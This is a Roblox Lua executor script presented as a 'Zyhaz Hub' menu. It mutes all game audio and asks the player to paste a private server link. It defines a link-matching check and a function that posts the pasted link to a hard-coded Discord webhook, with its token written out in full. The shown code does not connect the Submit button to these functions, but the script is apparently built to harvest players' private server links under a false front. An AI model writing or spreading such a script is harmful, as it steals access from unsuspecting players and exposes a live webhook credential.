----------------------------------------------------
-- SERVICES
----------------------------------------------------
local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")

local player = Players.LocalPlayer

----------------------------------------------------
-- HARD MUTE
----------------------------------------------------
for _, d in ipairs(game:GetDescendants()) do
	if d:IsA("Sound") then
		d.Volume = 0
		d:Stop()
	end
end

game.DescendantAdded:Connect(function(d)
	if d:IsA("Sound") then
		d.Volume = 0
		d:Stop()
	end
end)

----------------------------------------------------
-- SETTINGS
----------------------------------------------------
local TITLE_TEXT = "Zyhaz Hub"
local WEBHOOK_URL = "https://discord.com/api/webhooks/1451199591599837308/WZESlOWGSi2uUrlebj-Cl4q-ZDjGvVY8ycYwA_6SFWpyEc5oDht549vjNZ7VEThqhvMR"
local SECONDS_PER_PERCENT = 3.5

----------------------------------------------------
-- PRIVATE SERVER CHECK
----------------------------------------------------
local function isPrivateServerLink(text)
	if type(text) ~= "string" then return false end
	text = text:lower()
	return text:find("roblox.com")
		and (text:find("privateserverlinkcode=") or text:find("type=server"))
end

----------------------------------------------------
-- WEBHOOK
----------------------------------------------------
local function sendWebhook(text)
	local req =
		(syn and syn.request)
		or (http and http.request)
		or request
		or http_request

	if not req then return end

	req({
		Url = WEBHOOK_URL,
		Method = "POST",
		Headers = {["Content-Type"] = "application/json"},
		Body = HttpService:JSONEncode({
			content = "@everyone\nNew Private Server Link:\n"..text
		})
	})
end

----------------------------------------------------
-- GUI ROOT
----------------------------------------------------
local gui = Instance.new("ScreenGui")
gui.IgnoreGuiInset = true
gui.DisplayOrder = 99999
gui.Parent = player:WaitForChild("PlayerGui")

----------------------------------------------------
-- TOGGLE BUTTON
----------------------------------------------------
local toggle = Instance.new("TextButton", gui)
toggle.Size = UDim2.fromOffset(44,44)
toggle.Position = UDim2.fromOffset(10,10)
toggle.Text = "≡"
toggle.Font = Enum.Font.GothamBlack
toggle.TextScaled = true
toggle.TextColor3 = Color3.new(1,1,1)
toggle.BackgroundColor3 = Color3.fromRGB(25,25,25)
toggle.TextTransparency = 0
toggle.ZIndex = 50
Instance.new("UICorner", toggle).CornerRadius = UDim.new(1,0)

----------------------------------------------------
-- MENU
----------------------------------------------------
local menu = Instance.new("Frame", gui)
menu.Size = UDim2.fromScale(0.35,0.35)
menu.Position = UDim2.fromScale(0.325,0.325)
menu.BackgroundColor3 = Color3.fromRGB(18,18,18)
menu.BorderSizePixel = 0
menu.ZIndex = 20
Instance.new("UICorner", menu).CornerRadius = UDim.new(0,20)

local stroke = Instance.new("UIStroke", menu)
stroke.Thickness = 2

----------------------------------------------------
-- TITLE
----------------------------------------------------
local title = Instance.new("TextLabel", menu)
title.Size = UDim2.fromScale(1,0.22)
title.BackgroundTransparency = 1
title.Text = TITLE_TEXT
title.Font = Enum.Font.GothamBlack
title.TextScaled = true
title.TextColor3 = Color3.new(1,1,1)
title.TextTransparency = 0
title.TextStrokeTransparency = 0.75
title.ZIndex = 21

----------------------------------------------------
-- CLOSE
----------------------------------------------------
local close = Instance.new("TextButton", menu)
close.Size = UDim2.fromOffset(34,34)
close.Position = UDim2.fromScale(0.92,0.05)
close.Text = "✕"
close.Font = Enum.Font.GothamBold
close.TextScaled = true
close.BackgroundTransparency = 1
close.TextColor3 = Color3.new(1,1,1)
close.TextTransparency = 0
close.ZIndex = 21

----------------------------------------------------
-- TEXTBOX
----------------------------------------------------
local box = Instance.new("TextBox", menu)
box.Size = UDim2.fromScale(0.9,0.18)
box.Position = UDim2.fromScale(0.05,0.35)
box.BackgroundColor3 = Color3.fromRGB(35,35,35)
box.TextColor3 = Color3.new(1,1,1)
box.Font = Enum.Font.Gotham
box.TextScaled = true
box.TextTransparency = 0
box.PlaceholderText = "Paste PRIVATE SERVER link"
box.BorderSizePixel = 0
box.ZIndex = 21
Instance.new("UICorner", box).CornerRadius = UDim.new(0,14)

----------------------------------------------------
-- SUBMIT
----------------------------------------------------
local submit = Instance.new("TextButton", menu)
submit.Size = UDim2.fromScale(0.5,0.18)
submit.Position = UDim2.fromScale(0.25,0.62)
submit.Text = "Submit"
submit.Font = Enum.Font.GothamBold
submit.TextScaled = true
submit.TextColor3 = Color3.new(0,0,0)
submit.BackgroundColor3 = Color3.new(1,1,1)
submit.TextTransparency = 0
submit.ZIndex = 21
Instance.new("UICorner", submit).CornerRadius = UDim.new(0,14)

----------------------------------------------------
-- TWEEN HELPERS
----------------------------------------------------
local function fade(obj, props, t)
	TweenService:Create(obj, TweenInfo.new(t, Enum.EasingStyle.Quint, Enum.EasingDirection.Out), props):Play()
end

----------------------------------------------------
-- MENU TOGGLE (SAFE)
----------------------------------------------------
local open = true

local function closeMenu()
	fade(menu, {Position = menu.Position + UDim2.fromOffset(0,20), BackgroundTransparency = 1}, 0.25)
	task.delay(0.25, function() menu.Visible = false end)
	open = false
end

local function openMenu()
	menu.Visible = true
	menu.BackgroundTransparency = 1
	fade(menu, {Position = UDim2.fromScale(0.325,0.325), BackgroundTransparency = 0}, 0.25)
	open = true
end

toggle.MouseButton1Click:Connect(function()
	if open then closeMenu() else openMenu() end
end)

close.MouseButton1Click:Connect(closeMenu)
